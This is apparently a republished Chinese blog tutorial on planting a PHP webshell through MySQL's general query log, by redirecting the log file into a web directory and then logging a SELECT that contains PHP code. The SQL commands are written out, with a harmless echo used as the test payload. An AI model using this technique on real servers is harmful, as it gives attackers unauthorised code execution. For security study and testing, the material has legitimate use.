新版mysql写入webshell(测试版本5.5.53)
Posted
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了新版mysql写入webshell(测试版本5.5.53)相关的知识,希望对你有一定的参考价值。
0x01 前言
新版本的mysql在my.ini中设置了导出文件的路径,无法再使用select into outfile来写入一句话
此时在mysql文件夹下的my.ini中可以设置到处路径
但是在拿shell时,不可能去修改配置文件
可以通过修改mysql的log文件来获取webshell
0x02 过程
首先进入SQL环境,执行以下SQL语句:
show variables like "%general%";
修改如上两个地方的值,其中修改log的地址为网站目录下的php文件,其后log文件会写入其中,修改方法
set global general_log = on; set global general_log_file = "C:/phpStudy/PHPTutorial/MySQL/6.php";
然后执行
select "<?php echo 12344;?>"
此时在网站目录下6.PHP中就生成了一句话
成功执行。
以上是关于新版mysql写入webshell(测试版本5.5.53)的主要内容,如果未能解决你的问题,请参考以下文章